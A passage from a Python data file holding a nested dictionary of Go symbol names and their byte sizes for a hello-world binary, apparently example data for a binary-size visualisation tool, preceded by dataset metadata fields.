| 0.885965
| 0.112782
| 0
| 0
| 0
| 0
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
36e817883c9350adc3296a65cb3d1ea46f82bb89
| 90,366
|
py
|
Python
|
scripts/go-binsize-viz/example-data/helloworld/hello.py
|
ganeshkumarsv/datadog-lambda-extension
|
e6a7dad65a264478b5c1db9bb2195064c496b1cc
|
[
"Apache-2.0"
] | 9
|
2021-06-04T07:29:24.000Z
|
2022-03-21T00:43:34.000Z
|
scripts/go-binsize-viz/example-data/helloworld/hello.py
|
ganeshkumarsv/datadog-lambda-extension
|
e6a7dad65a264478b5c1db9bb2195064c496b1cc
|
[
"Apache-2.0"
] | 19
|
2021-05-25T13:16:51.000Z
|
2022-03-31T08:15:00.000Z
|
scripts/go-binsize-viz/example-data/helloworld/hello.py
|
ganeshkumarsv/datadog-lambda-extension
|
e6a7dad65a264478b5c1db9bb2195064c496b1cc
|
[
"Apache-2.0"
] | 1
|
2022-03-25T02:58:14.000Z
|
2022-03-25T02:58:14.000Z
|
{'children': {'go · ': {'children': {'$f32.': {'children': {'fffffffe': {'value': 4}}}, '$f64.': {'children': {'3eb0000000000000': {'value': 8}, '3fd0000000000000': {'value': 8}, '3fd3333333333333': {'value': 8}, '3fe0000000000000': {'value': 8}, '3fec000000000000': {'value': 8}, '3fee666666666666': {'value': 8}, '3ff0000000000000': {'value': 8}, '3ff199999999999a': {'value': 8}, '3ff3333333333333': {'value': 8}, '3ffe000000000000': {'value': 8}, '4014000000000000': {'value': 8}, '4024000000000000': {'value': 8}, '403a000000000000': {'value': 8}, '4059000000000000': {'value': 8}, '40f0000000000000': {'value': 8}, '43e0000000000000': {'value': 8}, '8000000000000000': {'value': 8}, 'bfd3333333333333': {'value': 8}, 'bfe62e42fefa39ef': {'value': 8}, 'fffffffffffffffe': {'value': 8}}}, 'errors.': {'children': {'(*errorString).': {'children': {'Error': {'value': 23}}}, 'New': {'value': 122}, 'go.itab.*errorString,error': {'value': 32}}}, 'fmt.': {'children': {'(*buffer).': {'children': {'WriteRune': {'value': 506}}}, '(*fmt).': {'children': {'fmtBoolean': {'value': 127}, 'fmtBx': {'value': 118}, 'fmtC': {'value': 183}, 'fmtFloat': {'value': 2202}, 'fmtInteger': {'value': 1289}, 'fmtQ': {'value': 487}, 'fmtQc': {'value': 247}, 'fmtS': {'value': 114}, 'fmtSbx': {'value': 1617}, 'fmtSx': {'value': 117}, 'fmtUnicode': {'value': 948}, 'pad': {'value': 968}, 'padString': {'value': 955}, 'truncate': {'value': 233}, 'writePadding': {'value': 391}}}, '(*pp).': {'children': {'Flag': {'value': 153}, 'Precision': {'value': 23}, 'Width': {'value': 23}, 'Write': {'value': 307}, 'badVerb': {'value': 1790}, 'catchPanic': {'value': 1375}, 'doPrintln': {'value': 487}, 'fmt0x64': {'value': 141}, 'fmtBool': {'value': 109}, 'fmtBytes': {'value': 2435}, 'fmtComplex': {'value': 573}, 'fmtFloat': {'value': 383}, 'fmtInteger': {'value': 783}, 'fmtPointer': {'value': 1456}, 'fmtString': {'value': 425}, 'free': {'value': 185}, 'handleMethods': {'value': 1205}, 'printArg': {'value': 2586}, 'printValue': {'value': 10938}, 'unknownType': {'value': 862}}}, 'Fprintln': {'value': 242}, 'Println': {'value': 137}, 'boolError': {'value': 16}, 'complexError': {'value': 16}, 'getField': {'value': 239}, 'glob.': {'children': {'func1': {'value': 84}}}, 'init': {'value': 277}, 'initdone.': {'value': 1}, 'newPrinter': {'value': 179}, 'ppFree': {'value': 24}, 'statictmp_0': {'value': 16}, 'go.itab.*pp,fmt.State': {'value': 56}}}, 'internal/': {'children': {'poll.': {'children': {'go.itab.*TimeoutError,error': {'value': 32}, '(*FD).': {'children': {'Close': {'value': 241}, 'Init': {'value': 184}, 'Write': {'value': 912}, 'decref': {'value': 124}, 'destroy': {'value': 164}, 'writeLock': {'value': 152}, 'writeUnlock': {'value': 93}}}, '(*TimeoutError).': {'children': {'Error': {'value': 22}}}, '(*fdMutex).': {'children': {'decref': {'value': 128}, 'increfAndClose': {'value': 289}, 'rwlock': {'value': 361}, 'rwunlock': {'value': 283}}}, '(*pollDesc).': {'children': {'close': {'value': 90}, 'evict': {'value': 78}, 'init': {'value': 226}, 'prepare': {'value': 285}, 'prepareWrite': {'value': 98}, 'wait': {'value': 365}, 'waitWrite': {'value': 98}}}, 'CloseFunc': {'value': 8}, 'ErrFileClosing': {'value': 16}, 'ErrNetClosing': {'value': 16}, 'ErrNoDeadline': {'value': 16}, 'ErrTimeout': {'value': 16}, 'init': {'value': 354}, 'initdone.': {'value': 1}, 'runtime_Semacquire': {'value': 74}, 'runtime_Semrelease': {'value': 60}, 'runtime_pollClose': {'value': 223}, 'runtime_pollOpen': {'value': 293}, 'runtime_pollReset': {'value': 120}, 'runtime_pollServerInit': {'value': 62}, 'runtime_pollUnblock': {'value': 475}, 'runtime_pollWait': {'value': 295}, 'serverInit': {'value': 12}, 'statictmp_1': {'value': 16}, 'statictmp_2': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_4': {'value': 16}, 'statictmp_5': {'value': 16}, 'statictmp_6': {'value': 16}, 'statictmp_7': {'value': 16}}}, 'bytealg.': {'children': {'IndexByteString': {'value': 24}, 'IndexByteString.': {'children': {'args_stackmap': {'value': 10}}}, 'MaxLen': {'value': 8}, 'init': {'value': 92}, 'init.': {'children': {'0': {'value': 37}}}, 'initdone.': {'value': 1}}}, 'cpu.': {'children': {'ARM64': {'value': 152}, 'X86': {'value': 144}, 'cpuid': {'value': 27}, 'cpuid.': {'children': {'args_stackmap': {'value': 10}}}, 'debugOptions': {'value': 1}, 'doinit': {'value': 1045}, 'indexByte': {'value': 52}, 'initialize': {'value': 75}, 'options': {'value': 24}, 'processOptions': {'value': 554}, 'statictmp_0': {'value': 360}, 'xgetbv': {'value': 17}, 'xgetbv.': {'children': {'args_stackmap': {'value': 10}}}}}, 'syscall/': {'children': {'unix.': {'children': {'IsNonblock': {'value': 143}, 'init': {'value': 92}, 'initdone.': {'value': 1}}}}}}}, 'os.': {'children': {'go.itab.*File,io.Writer': {'value': 32}, 'go.itab.*PathError,error': {'value': 32}, '(*File).': {'children': {'Name': {'value': 29}, 'Write': {'value': 740}, 'write': {'value': 125}}}, '(*PathError).': {'children': {'Error': {'value': 217}}}, '(*file).': {'children': {'close': {'value': 496}}}, 'Args': {'value': 24}, 'ErrClosed': {'value': 16}, 'ErrExist': {'value': 16}, 'ErrInvalid': {'value': 16}, 'ErrNoDeadline': {'value': 16}, 'ErrNotExist': {'value': 16}, 'ErrPermission': {'value': 16}, 'NewFile': {'value': 149}, 'Readlink': {'value': 546}, 'Stderr': {'value': 8}, 'Stdin': {'value': 8}, 'Stdout': {'value': 8}, 'epipecheck': {'value': 105}, 'errFinished': {'value': 16}, 'executablePath': {'value': 16}, 'executablePathErr': {'value': 16}, 'glob.': {'children': {'func1': {'value': 111}}}, 'init': {'value': 1025}, 'init.': {'children': {'0': {'value': 109}}}, 'initdone.': {'value': 1}, 'newFile': {'value': 480}, 'runtime_args': {'value': 269}, 'sigpipe': {'value': 62}, 'statictmp_4': {'value': 8}}}, 'reflect.': {'children': {'go.itab.*rtype,reflect.Type': {'value': 272}, '(*ChanDir).': {'children': {'String': {'value': 119}}}, '(*Kind).': {'children': {'String': {'value': 119}}}, '(*Value).': {'children': {'Kind': {'value': 127}, 'Len': {'value': 127}, 'NumField': {'value': 127}, 'NumMethod': {'value': 127}, 'String': {'value': 137}}}, '(*ValueError).': {'children': {'Error': {'value': 328}}}, '(*funcType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed128).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed16).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed32).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed4).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed64).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed8).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*interfaceType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 416}, 'MethodByName': {'value': 499}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 15}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*ptrType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*rtype).': {'children': {'Align': {'value': 15}, 'AssignableTo': {'value': 218}, 'Bits': {'value': 261}, 'ChanDir': {'value': 103}, 'Comparable': {'value': 31}, 'ConvertibleTo': {'value': 175}, 'Elem': {'value': 335}, 'Field': {'value': 286}, 'FieldAlign': {'value': 15}, 'FieldByIndex': {'value': 318}, 'FieldByName': {'value': 417}, 'FieldByNameFunc': {'value': 401}, 'Implements': {'value': 238}, 'In': {'value': 215}, 'IsVariadic': {'value': 107}, 'Key': {'value': 126}, 'Kind': {'value': 18}, 'Len': {'value': 103}, 'Method': {'value': 1971}, 'MethodByName': {'value': 866}, 'Name': {'value': 172}, 'NumField': {'value': 103}, 'NumIn': {'value': 103}, 'NumMethod': {'value': 102}, 'NumOut': {'value': 189}, 'Out': {'value': 265}, 'PkgPath': {'value': 202}, 'Size': {'value': 14}, 'String': {'value': 201}, 'common': {'value': 11}, 'exportedMethods': {'value': 166}, 'nameOff': {'value': 78}, 'ptrTo': {'value': 989}, 'textOff': {'value': 78}, 'typeOff': {'value': 78}, 'uncommon': {'value': 179}}}, '(*sliceType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*structType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 512}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 502}, 'FieldByName': {'value': 915}, 'FieldByName.': {'children': {'func1': {'value': 101}}}, 'FieldByNameFunc': {'value': 2803}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, 'ChanDir.': {'children': {'String': {'value': 260}}}, 'FuncOf': {'value': 3006}, 'FuncOf.': {'children': {'func1': {'value': 514}}}, 'Kind.': {'children': {'String': {'value': 202}}}, 'New': {'value': 207}, 'TypeOf': {'value': 34}, 'Value.': {'children': {'Bool': {'value': 81}, 'Bytes': {'value': 182}, 'Elem': {'value': 457}, 'Field': {'value': 333}, 'Index': {'value': 564}, 'Interface': {'value': 105}, 'Kind': {'value': 15}, 'Len': {'value': 496}, 'MapIndex': {'value': 604}, 'MapKeys': {'value': 800}, 'NumField': {'value': 83}, 'NumMethod': {'value': 205}, 'Pointer': {'value': 464}, 'SetBytes': {'value': 217}, 'SetString': {'value': 126}, 'Slice': {'value': 724}, 'String': {'value': 293}, 'Type': {'value': 436}, 'assignTo': {'value': 1112}, 'runes': {'value': 182}, 'setRunes': {'value': 217}}}, 'Zero': {'value': 241}, 'addReflectOff': {'value': 375}, 'addTypeBits': {'value': 1347}, 'call': {'value': 5}, 'callMethod': {'value': 772}, 'chanlen': {'value': 29}, 'convertOp': {'value': 1317}, 'cvtBytesString': {'value': 240}, 'cvtComplex': {'value': 322}, 'cvtDirect': {'value': 212}, 'cvtFloat': {'value': 292}, 'cvtFloatInt': {'value': 296}, 'cvtFloatUint': {'value': 333}, 'cvtI2I': {'value': 504}, 'cvtInt': {'value': 356}, 'cvtIntFloat': {'value': 365}, 'cvtIntString': {'value': 400}, 'cvtRunesString': {'value': 240}, 'cvtStringBytes': {'value': 243}, 'cvtStringRunes': {'value': 243}, 'cvtT2I': {'value': 430}, 'cvtUint': {'value': 372}, 'cvtUintFloat': {'value': 420}, 'cvtUintString': {'value': 416}, 'directlyAssignable': {'value': 196}, 'dummy': {'value': 24}, 'flag.': {'children': {'mustBe': {'value': 192}, 'mustBeAssignable': {'value': 506}}}, 'fnv1': {'value': 47}, 'funcLayout': {'value': 2942}, 'funcLayout.': {'children': {'func1': {'value': 81}}}, 'funcLookupCache': {'value': 48}, 'funcStr': {'value': 2409}, 'haveIdenticalType': {'value': 406}, 'haveIdenticalUnderlyingType': {'value': 3118}, 'ifaceE2I': {'value': 141}, 'implements': {'value': 2071}, 'init': {'value': 247}, 'initdone.': {'value': 1}, 'kindNames': {'value': 24}, 'layoutCache': {'value': 40}, 'makeBytes': {'value': 245}, 'makeComplex': {'value': 207}, 'makeFloat': {'value': 181}, 'makeInt': {'value': 209}, 'makeMethodValue': {'value': 624}, 'makeRunes': {'value': 245}, 'makeString': {'value': 232}, 'mapaccess': {'value': 107}, 'mapiterinit': {'value': 111}, 'mapiterkey': {'value': 14}, 'mapiternext': {'value': 60}, 'maplen': {'value': 29}, 'memmove': {'value': 80}, 'methodName': {'value': 146}, 'methodReceiver': {'value': 1070}, 'methodValueCall': {'value': 91}, 'methodValueCall.': {'children': {'args_stackmap': {'value': 8}}}, 'name.': {'children': {'pkgPath': {'value': 265}, 'tag': {'value': 142}, 'tagLen': {'value': 79}}}, 'newName': {'value': 829}, 'packEface': {'value': 249}, 'ptrMap': {'value': 40}, 'resolveNameOff': {'value': 78}, 'resolveReflectName': {'value': 68}, 'resolveTextOff': {'value': 78}, 'resolveTypeOff': {'value': 78}, 'statictmp_10': {'value': 16}, 'statictmp_107': {'value': 16}, 'statictmp_108': {'value': 16}, 'statictmp_11': {'value': 16}, 'statictmp_112': {'value': 16}, 'statictmp_114': {'value': 16}, 'statictmp_115': {'value': 16}, 'statictmp_116': {'value': 16}, 'statictmp_117': {'value': 16}, 'statictmp_118': {'value': 16}, 'statictmp_119': {'value': 16}, 'statictmp_12': {'value': 16}, 'statictmp_120': {'value': 16}, 'statictmp_121': {'value': 16}, 'statictmp_124': {'value': 16}, 'statictmp_125': {'value': 16}, 'statictmp_13': {'value': 16}, 'statictmp_130': {'value': 16}, 'statictmp_131': {'value': 16}, 'statictmp_136': {'value': 16}, 'statictmp_137': {'value': 16}, 'statictmp_138': {'value': 16}, 'statictmp_14': {'value': 16}, 'statictmp_141': {'value': 16}, 'statictmp_142': {'value': 16}, 'statictmp_15': {'value': 16}, 'statictmp_16': {'value': 16}, 'statictmp_163': {'value': 16}, 'statictmp_164': {'value': 16}, 'statictmp_168': {'value': 432}, 'statictmp_169': {'value': 1}, 'statictmp_17': {'value': 16}, 'statictmp_18': {'value': 16}, 'statictmp_19': {'value': 16}, 'statictmp_20': {'value': 16}, 'statictmp_21': {'value': 16}, 'statictmp_22': {'value': 16}, 'statictmp_23': {'value': 16}, 'statictmp_24': {'value': 104}, 'statictmp_25': {'value': 8}, 'statictmp_26': {'value': 1}, 'statictmp_27': {'value': 16}, 'statictmp_28': {'value': 16}, 'statictmp_29': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_30': {'value': 16}, 'statictmp_34': {'value': 16}, 'statictmp_35': {'value': 16}, 'statictmp_36': {'value': 16}, 'statictmp_38': {'value': 16}, 'statictmp_39': {'value': 16}, 'statictmp_4': {'value': 16}, 'statictmp_48': {'value': 16}, 'statictmp_49': {'value': 8}, 'statictmp_5': {'value': 16}, 'statictmp_50': {'value': 16}, 'statictmp_51': {'value': 16}, 'statictmp_52': {'value': 1}, 'statictmp_53': {'value': 1}, 'statictmp_54': {'value': 16}, 'statictmp_6': {'value': 16}, 'statictmp_7': {'value': 80}, 'statictmp_77': {'value': 16}, 'statictmp_78': {'value': 40}, 'statictmp_8': {'value': 80}, 'statictmp_80': {'value': 16}, 'statictmp_82': {'value': 16}, 'statictmp_83': {'value': 16}, 'statictmp_9': {'value': 16}, 'typedmemclr': {'value': 70}, 'typedmemmove': {'value': 80}, 'typedmemmovepartial': {'value': 308}, 'typelinks': {'value': 966}, 'typesByString': {'value': 1074}, 'uint8Type': {'value': 8}, 'unsafe_New': {'value': 83}, 'valueInterface': {'value': 458}}}, 'runtime.': {'children': {'go.itab.errorString,error': {'value': 32}, '(*Func).': {'children': {'Name': {'value': 127}, 'funcInfo': {'value': 83}}}, '(*TypeAssertionError).': {'children': {'Error': {'value': 1102}}}, '(*_type).': {'children': {'nameOff': {'value': 78}, 'pkgpath': {'value': 257}, 'string': {'value': 175}, 'textOff': {'value': 800}, 'typeOff': {'value': 78}, 'uncommon': {'value': 170}}}, '(*bucket).': {'children': {'bp': {'value': 108}, 'mp': {'value': 99}}}, '(*cpuProfile).': {'children': {'add': {'value': 285}, 'addExtra': {'value': 586}, 'addNonGo': {'value': 238}}}, '(*errorString).': {'children': {'Error': {'value': 128}}}, '(*fixalloc).': {'children': {'alloc': {'value': 366}}}, '(*gcControllerState).': {'children': {'endCycle': {'value': 1207}, 'enlistWorker': {'value': 379}, 'findRunnableGCWorker': {'value': 619}, 'revise': {'value': 265}, 'startCycle': {'value': 896}}}, '(*gcSweepBuf).': {'children': {'block': {'value': 212}, 'push': {'value': 435}}}, '(*gcWork).': {'children': {'balance': {'value': 182}, 'dispose': {'value': 214}, 'get': {'value': 230}, 'init': {'value': 97}, 'put': {'value': 255}, 'putBatch': {'value': 464}, 'tryGet': {'value': 230}}}, '(*hmap).': {'children': {'incrnoverflow': {'value': 130}, 'newoverflow': {'value': 695}}}, '(*itab).': {'children': {'init': {'value': 1115}}}, '(*itabTableType).': {'children': {'add': {'value': 83}, 'add-fm': {'value': 69}, 'find': {'value': 96}}}, '(*lfstack).': {'children': {'pop': {'value': 55}, 'push': {'value': 346}}}, '(*linearAlloc).': {'children': {'alloc': {'value': 215}}}, '(*mSpanList).': {'children': {'insert': {'value': 277}, 'insertBack': {'value': 279}, 'remove': {'value': 402}, 'takeAll': {'value': 88}}}, '(*mTreap).': {'children': {'insert': {'value': 743}, 'remove': {'value': 192}, 'removeNode': {'value': 304}, 'removeSpan': {'value': 143}, 'rotateLeft': {'value': 193}, 'rotateRight': {'value': 189}}}, '(*mcache).': {'children': {'nextFree': {'value': 611}, 'nextFree.': {'children': {'func1': {'value': 67}}}, 'refill': {'value': 308}, 'releaseAll': {'value': 158}}}, '(*mcentral).': {'children': {'cacheSpan': {'value': 1116}, 'freeSpan': {'value': 391}, 'grow': {'value': 378}, 'uncacheSpan': {'value': 283}}}, '(*mheap).': {'children': {'alloc': {'value': 230}, 'alloc.': {'children': {'func1': {'value': 106}}}, 'allocLarge': {'value': 88}, 'allocManual': {'value': 224}, 'allocSpanLocked': {'value': 1028}, 'alloc_m': {'value': 803}, 'freeManual': {'value': 176}, 'freeSpan': {'value': 125}, 'freeSpan.': {'children': {'func1': {'value': 293}}}, 'freeSpanLocked': {'value': 1498}, 'grow': {'value': 483}, 'init': {'value': 1273}, 'reclaim': {'value': 426}, 'reclaimList': {'value': 336}, 'scavenge': {'value': 785}, 'setSpans': {'value': 194}, 'sysAlloc': {'value': 1661}}}, '(*mspan).': {'children': {'countAlloc': {'value': 134}, 'ensureSwept': {'value': 216}, 'nextFreeIndex': {'value': 380}, 'refillAllocCache': {'value': 25}, 'sweep': {'value': 2384}}}, '(*pcExpander).': {'children': {'init': {'value': 592}, 'next': {'value': 1079}}}, '(*plainError).': {'children': {'Error': {'value': 128}}}, '(*pollCache).': {'children': {'alloc': {'value': 203}, 'free': {'value': 92}}}, '(*profBuf).': {'children': {'canWriteRecord': {'value': 160}, 'canWriteTwoRecords': {'value': 219}, 'incrementOverflow': {'value': 69}, 'takeOverflow': {'value': 105}, 'wakeupExtra': {'value': 111}, 'write': {'value': 1125}}}, '(*randomOrder).': {'children': {'reset': {'value': 275}}}, '(*rwmutex).': {'children': {'rlock': {'value': 132}, 'rlock.': {'children': {'func1': {'value': 198}}}, 'runlock': {'value': 249}}}, '(*semaRoot).': {'children': {'dequeue': {'value': 885}, 'queue': {'value': 1103}, 'rotateLeft': {'value': 530}, 'rotateRight': {'value': 490}}}, '(*sigctxt).': {'children': {'preparePanic': {'value': 237}}}, '(*stackExpander).': {'children': {'next': {'value': 936}}}, '(*traceAlloc).': {'children': {'alloc': {'value': 274}}}, '(*traceBuf).': {'children': {'varint': {'value': 117}}}, '(*traceStackTable).': {'children': {'find': {'value': 170}, 'newStack': {'value': 94}, 'put': {'value': 498}}}, '(*waitReason).': {'children': {'String': {'value': 118}}}, '(*waitq).': {'children': {'dequeue': {'value': 240}}}, '(*wbBuf).': {'children': {'reset': {'value': 149}}}, '(*workbuf).': {'children': {'checkempty': {'value': 